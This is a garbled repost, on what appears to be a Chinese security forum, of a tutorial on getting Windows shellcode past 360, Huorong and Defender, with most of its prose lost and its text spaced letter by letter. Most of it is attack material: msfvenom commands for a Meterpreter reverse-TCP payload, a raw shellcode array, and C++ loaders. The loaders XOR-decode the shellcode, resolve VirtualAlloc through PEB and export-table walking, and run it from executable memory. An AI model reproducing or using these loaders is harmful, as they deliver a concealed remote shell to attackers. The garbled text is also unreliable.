[22281] 2021-08-23_【Windows】Shellcode免杀,过360、火绒、Defender静态及主防

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2021-08-23_【Windows】Shellcode免杀,过360、火绒、Defender静态及主防 W i n d o w s S h e l l c o d e 3 6 0 D e f e n d e r   L e m o n S e c   2 0 2 1 - 0 8 - 2 3         S h e l l c o d e 使 S h e l l c o d e         S h e l l c o d e S h e l l c o d e S h e l l c o d e         S h e l l c o d e                 使 M e t a s p l o i t p a y l o a d         p a y l o a d . e x e         S h e l l c o d e         p a y l o a d . c         使 C + + S h e l l c o d e         V i s u a l   S t u d i o   2 0 1 9 R e l e a s e   x 8 6         1 2 3 S h e l l c o d e                 D e f e n d e r         D e f e n d e r p a y l o a d m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = x x x   - f   e x e   - o   p a y l o a d . e x e m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = x x x   - f   c   - o   p a y l o a d . c u n s i g n e d   c h a r   b u f [ ]   =   " x f c x e 8 x 8 f x 0 0 x 0 0 x 0 0 x 6 0 x 3 1 x d 2 x 8 9 x e 5 x 6 4 x 8 b x 5 2 x 3 0 " " x 8 b x 5 2 x 0 c x 8 b x 5 2 x 1 4 x 3 1 x f f x 0 f x b 7 x 4 a x 2 6 x 8 b x 7 2 x 2 8 " " x 3 1 x c 0 x a c x 3 c x 6 1 x 7 c x 0 2 x 2 c x 2 0 x c 1 x c f x 0 d x 0 1 x c 7 x 4 9 " " x 7 5 x e f x 5 2 x 8 b x 5 2 x 1 0 x 5 7 x 8 b x 4 2 x 3 c x 0 1 x d 0 x 8 b x 4 0 x 7 8 " " x 8 5 x c 0 x 7 4 x 4 c x 0 1 x d 0 x 8 b x 5 8 x 2 0 x 0 1 x d 3 x 8 b x 4 8 x 1 8 x 5 0 " " x 8 5 x c 9 x 7 4 x 3 c x 3 1 x f f x 4 9 x 8 b x 3 4 x 8 b x 0 1 x d 6 x 3 1 x c 0 x c 1 " " x c f x 0 d x a c x 0 1 x c 7 x 3 8 x e 0 x 7 5 x f 4 x 0 3 x 7 d x f 8 x 3 b x 7 d x 2 4 " " x 7 5 x e 0 x 5 8 x 8 b x 5 8 x 2 4 x 0 1 x d 3 x 6 6 x 8 b x 0 c x 4 b x 8 b x 5 8 x 1 c " " x 0 1 x d 3 x 8 b x 0 4 x 8 b x 0 1 x d 0 x 8 9 x 4 4 x 2 4 x 2 4 x 5 b x 5 b x 6 1 x 5 9 " " x 5 a x 5 1 x f f x e 0 x 5 8 x 5 f x 5 a x 8 b x 1 2 x e 9 x 8 0 x f f x f f x f f x 5 d " " x 6 8 x 3 3 x 3 2 x 0 0 x 0 0 x 6 8 x 7 7 x 7 3 x 3 2 x 5 f x 5 4 x 6 8 x 4 c x 7 7 x 2 6 " " x 0 7 x 8 9 x e 8 x f f x d 0 x b 8 x 9 0 x 0 1 x 0 0 x 0 0 x 2 9 x c 4 x 5 4 x 5 0 x 6 8 " " x 2 9 x 8 0 x 6 b x 0 0 x f f x d 5 x 6 a x 0 a x 6 8 x c 0 x a 8 x 9 9 x 8 1 x 6 8 x 0 2 " " x 0 0 x 1 1 x 5 c x 8 9 x e 6 x 5 0 x 5 0 x 5 0 x 5 0 x 4 0 x 5 0 x 4 0 x 5 0 x 6 8 x e a " " x 0 f x d f x e 0 x f f x d 5 x 9 7 x 6 a x 1 0 x 5 6 x 5 7 x 6 8 x 9 9 x a 5 x 7 4 x 6 1 " " x f f x d 5 x 8 5 x c 0 x 7 4 x 0 a x f f x 4 e x 0 8 x 7 5 x e c x e 8 x 6 7 x 0 0 x 0 0 " " x 0 0 x 6 a x 0 0 x 6 a x 0 4 x 5 6 x 5 7 x 6 8 x 0 2 x d 9 x c 8 x 5 f x f f x d 5 x 8 3 " " x f 8 x 0 0 x 7 e x 3 6 x 8 b x 3 6 x 6 a x 4 0 x 6 8 x 0 0 x 1 0 x 0 0 x 0 0 x 5 6 x 6 a " " x 0 0 x 6 8 x 5 8 x a 4 x 5 3 x e 5 x f f x d 5 x 9 3 x 5 3 x 6 a x 0 0 x 5 6 x 5 3 x 5 7 " " x 6 8 x 0 2 x d 9 x c 8 x 5 f x f f x d 5 x 8 3 x f 8 x 0 0 x 7 d x 2 8 x 5 8 x 6 8 x 0 0 " " x 4 0 x 0 0 x 0 0 x 6 a x 0 0 x 5 0 x 6 8 x 0 b x 2 f x 0 f x 3 0 x f f x d 5 x 5 7 x 6 8 " " x 7 5 x 6 e x 4 d x 6 1 x f f x d 5 x 5 e x 5 e x f f x 0 c x 2 4 x 0 f x 8 5 x 7 0 x f f " " x f f x f f x e 9 x 9 b x f f x f f x f f x 0 1 x c 3 x 2 9 x c 6 x 7 5 x c 1 x c 3 x b b " " x f 0 x b 5 x a 2 x 5 6 x 6 a x 0 0 x 5 3 x f f x d 5 " ; # i n c l u d e   < W i n d o w s . h > # i n c l u d e   < i o s t r e a m > u s i n g   n a m e s p a c e   s t d ; / /   p a y l o a d . c i n t   m a i n ( ) {     i n t   a ;     c i n   > >   a ;     i f   ( a   = =   1 2 3 )     {         a u t o   b   =   ( v o i d ( * ) ( ) ) V i r t u a l A l l o c ( N U L L ,   s i z e o f ( b u f ) ,   M E M _ C O M M I T   |   M E M _ R E S E R V E ,   P A G E _ E X E C U T E _ R E A D W R I T E ) ;         m e m c p y ( b ,   b u f ,   s i z e o f ( b u f ) ) ;         b ( ) ;     } } s t r i n g   s ; f o r   ( s i z e _ t   i   =   0 ;   i   <   s i z e o f ( b u f ) ;   i + + ) {     i n t   n   =   b u f [ i ]   ^   0 x 4 4 ;
        p a y l o a d p a y l o a d p a y l o a d b ( ) ;         D e f e n d e r D e f e n d e r S h e l l c o d e D e f e n d e r         3 6 0 3 6 0                 S h e l l c o d e S h e l l c o d e C + +         V i r t u a l A l l o c         V i r t u a l A l l o c     c h a r   c [ 5 ] { } ;     s p r i n t f _ s ( c ,   " x % x " ,   n ) ;     s   + =   c ; } c o u t   < <   s   < <   e n d l ; f o r   ( s i z e _ t   i   =   0 ;   i   <   s i z e o f ( b u f ) ;   i + + ) {     ( ( u n s i g n e d   c h a r * ) b ) [ i ]   ^ =   0 x 4 4 ; } # i n c l u d e   < W i n d o w s . h > # i n c l u d e   < i o s t r e a m > u s i n g   n a m e s p a c e   s t d ; t y p e d e f   F A R P R O C ( W I N A P I *   f G e t P r o c A d d r e s s ) ( H M O D U L E ,   L P C S T R ) ; t y p e d e f   L P V O I D ( W I N A P I *   f V i r t u a l A l l o c ) ( L P V O I D ,   S I Z E _ T ,   D W O R D ,   D W O R D ) ; u n s i g n e d   c h a r   b u f [ ]   =   " x b 8 x a c x c b x 4 4 x 4 4 x 4 4 x 2 4 x 7 5 x 9 6 x c d x a 1 x 2 0 x c f x 1 6 x 7 4 x c f x 1 6 x 4 8 x c f x 1 6 x 5 0 x 7 5 x b b x 4 b x f 3 x e x 6 2 x c f x 3 6 x 6 c x 7 5 x 8 4 x e 8 x 7 8 x 2 5 x 3 8 x 4 6 x 6 8 x 6 4 x 8 5 x 8 b x 4 9 x 4 5 x 8 3 x d x 3 1 x a b x 1 6 x c f x 1 6 x 5 4 x 1 3 x c f x 6 x 7 8 x 4 5 x 9 4 x c f x 4 x 3 c x c 1 x 8 4 x 3 0 x 8 x 4 5 x 9 4 x c f x 1 c x 6 4 x 4 5 x 9 7 x c f x c x 5 c x 1 4 x c 1 x 8 d x 3 0 x 7 8 x 7 5 x b b x d x c f x 7 0 x c f x 4 5 x 9 2 x 7 5 x 8 4 x 8 5 x 8 b x 4 9 x e 8 x 4 5 x 8 3 x 7 c x a 4 x 3 1 x b 0 x 4 7 x 3 9 x b c x 7 f x 3 9 x 6 0 x 3 1 x a 4 x 1 c x c f x 1 c x 6 0 x 4 5 x 9 7 x 2 2 x c f x 4 8 x f x c f x 1 c x 5 8 x 4 5 x 9 7 x c f x 4 0 x c f x 4 5 x 9 4 x c d x 0 x 6 0 x 6 0 x 1 f x 1 f x 2 5 x 1 d x 1 e x 1 5 x b b x a 4 x 1 c x 1 b x 1 e x c f x 5 6 x a d x c 4 x b b x b b x b b x 1 9 x 2 c x 7 7 x 7 6 x 4 4 x 4 4 x 2 c x 3 3 x 3 7 x 7 6 x 1 b x 1 0 x 2 c x 8 x 3 3 x 6 2 x 4 3 x c d x a c x b b x 9 4 x f c x d 4 x 4 5 x 4 4 x 4 4 x 6 d x 8 0 x 1 0 x 1 4 x 2 c x 6 d x c 4 x 2 f x 4 4 x b b x 9 1 x 2 e x 4 e x 2 c x 8 4 x e c x d d x c 5 x 2 c x 4 6 x 4 4 x 5 5 x 1 8 x c d x a 2 x 1 4 x 1 4 x 1 4 x 1 4 x 4 x 1 4 x 4 x 1 4 x 2 c x a e x 4 b x 9 b x a 4 x b b x 9 1 x d 3 x 2 e x 5 4 x 1 2 x 1 3 x 2 c x d d x e 1 x 3 0 x 2 5 x b b x 9 1 x c 1 x 8 4 x 3 0 x 4 e x b b x a x 4 c x 3 1 x a 8 x a c x 2 3 x 4 4 x 4 4 x 4 4 x 2 e x 4 4 x 2 e x 4 0 x 1 2 x 1 3 x 2 c x 4 6 x 9 d x 8 c x 1 b x b b x 9 1 x c 7 x b c x 4 4 x 3 a x 7 2 x c f x 7 2 x 2 e x 4 x 2 c x 4 4 x 5 4 x 4 4 x 4 4 x 1 2 x 2 e x 4 4 x 2 c x 1 c x e 0 x 1 7 x a 1 x b b x 9 1 x d 7 x 1 7 x 2 e x 4 4 x 1 2 x 1 7 x 1 3 x 2 c x 4 6 x 9 d x 8 c x 1 b x b b x 9 1 x c 7 x b c x 4 4 x 3 9 x 6 c x 1 c x 2 c x 4 4 x 4 x 4 4 x 4 4 x 2 e x 4 4 x 1 4 x 2 c x 4 f x 6 b x 4 b x 7 4 x b b x 9 1 x 1 3 x 2 c x 3 1 x 2 a x 9 x 2 5 x b b x 9 1 x 1 a x 1 a x b b x 4 8 x 6 0 x 4 b x c 1 x 3 4 x b b x b b x b b x a d x d f x b b x b b x b b x 4 5 x 8 7 x 6 d x 8 2 x 3 1 x 8 5 x 8 7 x f f x b 4 x f 1 x e 6 x 1 2 x 2 e x 4 4 x 1 7 x b b x 9 1 " s i z e _ t   g e t K e r n e l B a s e ( ) {     r e t u r n   * ( * * * ( * ( ( s i z e _ t * * * * * ) _ _ r e a d f s d w o r d ( 0 x 3 0 )   +   3 )   +   7 )   +   2 ) ; } i n t   m a i n ( ) {     i n t   a ;     c i n   > >   a ;     i f   ( a   = =   1 2 3 )     {         s i z e _ t   h K e r n e l   =   g e t K e r n e l B a s e ( ) ;         P I M A G E _ D O S _ H E A D E R   p I m a g e D o s H e a d e r   =   ( P I M A G E _ D O S _ H E A D E R ) h K e r n e l ;         P I M A G E _ N T _ H E A D E R S   p I m a g e N t H e a d e r   =   ( P I M A G E _ N T _ H E A D E R S ) ( p I m a g e D o s H e a d e r - > e _ l f a n e w   +   h K e r n e l ) ;         P I M A G E _ E X P O R T _ D I R E C T O R Y   p I m a g e E x p o r t D i r e c t o r y   =   ( P I M A G E _ E X P O R T _ D I R E C T O R Y ) ( p I m a g e N t H e a d e r - > O p t i o n a l H e a d e r . D a t a D i r e c t o r y [ I M A G E _ D I R E C T O R Y _ E N T R Y _ E X P O R T ] . V i r t u a l A d d r e s s   +   h K e r n e l ) ;         s i z e _ t   n a m e C o u n t   =   p I m a g e E x p o r t D i r e c t o r y - > N u m b e r O f N a m e s ;         s i z e _ t   f u n c A d d r   =   p I m a g e E x p o r t D i r e c t o r y - > A d d r e s s O f F u n c t i o n s   +   h K e r n e l ;         s i z e _ t   n a m e A d d r   =   p I m a g e E x p o r t D i r e c t o r y - > A d d r e s s O f N a m e s   +   h K e r n e l ;         s i z e _ t   o r d i n a l   =   p I m a g e E x p o r t D i r e c t o r y - > A d d r e s s O f N a m e O r d i n a l s   +   h K e r n e l ;         f G e t P r o c A d d r e s s   f n G e t P r o c A d d r e s s   =   N U L L ;         f o r   ( s i z e _ t   i   =   0 ;   i   <   n a m e C o u n t ;   i + + )         {             U S H O R T *   n   =   ( U S H O R T * ) ( * ( s i z e _ t * ) ( n a m e A d d r   +   i   *   4 )   +   h K e r n e l ) ;             i f   ( n [ 0 ]   = =   0 x 6 5 4 7   & &   n [ 1 ]   = =   0 x 5 0 7 4   & &   n [ 2 ]   = =   0 x 6 f 7 2   & &   n [ 3 ]   = =   0 x 4 1 6 3   & &   n [ 4 ]   = =   0 x 6 4 6 4   & &   n [ 5 ]   = =   0 x 6 5 7 2   & &   n [ 6 ]   = =   0 x 7 3 7 3 )             {                 f n G e t P r o c A d d r e s s   =   ( f G e t P r o c A d d r e s s ) ( * ( s i z e _ t * ) ( f u n c A d d r   +   * ( U S H O R T * ) ( o r d i n a l   +   i   *   2 )   *   4 )   +   h K e r n e l ) ;             }         }         i f   ( f n G e t P r o c A d d r e s s   = =   N U L L )         {             r e t u r n   0 ;         }         s i z e _ t   s t r 1 [ 4 ] ;         s t r 1 [ 0 ]   =   0 x 7 4 7 2 6 9 5 6 ;         s t r 1 [ 1 ]   =   0 x 4 1 6 c 6 1 7 5 ;         s t r 1 [ 2 ]   =   0 x 6 3 6 f 6 c 6 c ;         s t r 1 [ 3 ]   =   0 x 0 ;         f V i r t u a l A l l o c   f n V i r t u a l A l l o c   =   ( f V i r t u a l A l l o c ) f n G e t P r o c A d d r e s s ( ( H M O D U L E ) h K e r n e l ,   ( c h a r * ) s t r 1 ) ;         a u t o   b   =   ( v o i d ( * ) ( ) ) f n V i r t u a l A l l o c ( N U L L ,   s i z e o f ( b u f ) ,   M E M _ C O M M I T   |   M E M _ R E S E R V E ,   P A G E _ E X E C U T E _ R E A D W R I T E ) ;         m e m c p y ( b ,   b u f ,   s i z e o f ( b u f ) ) ;         f o r   ( s i z e _ t   i   =   0 ;   i   <   s i z e o f ( b u f ) ;   i + + )         {             ( ( u n s i g n e d   c h a r * ) b ) [ i ]   ^ =   0 x 4 4 ;         }         b ( ) ;     } }
        K e r n e l 3 2 . d l l + P E                 3 6 0 S h e l l c o d e         D e f e n d e r ~         S h e l l c o d e =   =         p o w e r s h e l l         - - -         使   C S D N h t t p s : / / b l o g . c s d n . n e t / t q y d y q t / a r t i c l e / d e t a i l s / 1 1 3 8 3 1 5 3 3
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则